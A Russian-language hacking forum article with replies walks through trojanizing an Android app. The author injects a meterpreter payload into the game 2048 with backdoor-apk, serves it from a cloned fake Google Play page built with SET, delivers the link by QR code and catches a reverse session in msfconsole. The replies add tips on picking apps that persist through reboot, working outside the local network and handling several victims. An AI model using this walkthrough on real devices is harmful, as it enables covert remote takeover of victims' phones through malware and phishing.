• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

upload_2016-12-5_13-26-37.png


Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

> git clone https://github.com/dana-at-cp/backdoor-apk.git

upload_2016-12-5_13-27-3.png


Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

upload_2016-12-5_13-27-30.png


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.


Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

upload_2016-12-5_13-29-42.png


Сохраняем файл:

upload_2016-12-5_13-30-4.png


Затем скопируем файл в папку с установленным Backdoor-apk.

upload_2016-12-5_13-30-20.png


Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> cd backdoor-apk

> cd backdoor-apk

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

upload_2016-12-5_13-30-55.png


Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

upload_2016-12-5_13-31-17.png


Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

upload_2016-12-5_13-31-53.png

upload_2016-12-5_13-31-59.png


На этом пока остановимся.

Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:


> setoolkit

Выбираем:

upload_2016-12-5_13-32-59.png


Выберем Website Attack Vectors.

upload_2016-12-5_13-33-17.png


Нас интересует HTA – Attack Method.

upload_2016-12-5_13-33-53.png


Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store


upload_2016-12-5_13-38-50.png


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

upload_2016-12-5_13-39-52.png


Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

upload_2016-12-5_13-40-34.png


Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

upload_2016-12-5_13-41-38.png


Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

upload_2016-12-5_13-42-7.png


На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

upload_2016-12-5_13-42-29.png


Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

upload_2016-12-5_13-42-51.png


Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Установим игру.

upload_2016-12-5_13-43-11.png


Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

upload_2016-12-5_13-43-39.png


И затем, запустим игру.

upload_2016-12-5_13-44-4.png


В консоли получаем активную сессию meterpreter.

upload_2016-12-5_13-44-20.png


На этом все, спасибо за внимание.
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Игрушка 2048, работала исправно. так же полагаю будильники должны работать.

У меня сработал калькулятор инженерный и File Manager. 2048 собралась, но связь рушилась - и были недоступны часть функций. ZIP архиватор через раз срабатывал. Тестил на Андре 4.2, 4.4, 5.х. Почти 80% либо "краш" на сборке, либо нет полноценной работы. Очень трудно найти. Причем, не важно чем отрабатывать FatRat, apk-backdoor, spada - если приложение не подходит, то не подходит.
При верном подходе и хорошем стечении обстоятельств тема весьма рабочая.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 350
BIT
0
У меня сработал калькулятор инженерный и File Manager. 2048 собралась, но связь рушилась - и были недоступны часть функций. ZIP архиватор через раз срабатывал. Тестил на Андре 4.2, 4.4, 5.х. Почти 80% либо "краш" на сборке, либо нет полноценной работы. Очень трудно найти. Причем, не важно чем отрабатывать FatRat, apk-backdoor, spada - если приложение не подходит, то не подходит.
При верном подходе и хорошем стечении обстоятельств тема весьма рабочая.
И при маниакальной усидчивости и терпении)
 
  • Нравится
Реакции: kot-gor и ghostphisher
S

s1rk0

Как-то можно сделать так, что бы сессия оставалась активная?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Тут в большой степени от приложения зависит, нужно пробовать с различными

например с часами, будильниками, прогнозом погоды, новостями - у них есть функция загрузки вместе с системой.
 
  • Нравится
Реакции: Vander
C

CyanFox

Статья конечно класс! А то, что битая кодировка плея никто не заметил?
 

TechHuk

Green Team
22.01.2017
14
2
BIT
0
Можно ли будет скомпилить так, чтобы работало не в локале?
 
S

Sokratik

[*] Recompiling original project with backdoor...done.
date: неверная дата «Sun Jul 28 09:03:47 2041»
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[!] Failed to align recompiled APK

Просмотрел дату даже в биосе - у меня все нормально. Я с этой прогой наверно промучился дня 3, и всегда она выдает ошибки. Кто лечил подобные вещи? И чем они лечатся? буду премного благодарен
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 350
BIT
0
Recompiling original project with backdoor...done.
date: неверная дата «Sun Jul 28 09:03:47 2041»
Generating RSA key for signing...done.
Signing recompiled APK...done.
Verifying signed artifacts...done.
Aligning recompiled APK...done.
[!] Failed to align recompiled APK

Просмотрел дату даже в биосе - у меня все нормально. Я с этой прогой наверно промучился дня 3, и всегда она выдает ошибки. Кто лечил подобные вещи? И чем они лечатся? буду премного благодарен
Что это за прога?
 
S

Sokratik

Проблема в том, что у тебя не компилируется окончательное приложение, верно?
Да, порой разные ошибки, полагаю проблема в том, что сертификат создается на странное время. А так - да, не собирается приложение в конце
 
0

0000

А теперь, для самых тупых (меня), расскажите, как его после установки юзать?
 

House26

Green Team
09.10.2017
74
11
BIT
0
Такой вопрос,а если .apk файл будет установлен не на одно устройство,а скажем на два?Можно ли получать сессию ,как то переключаясь между ними?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!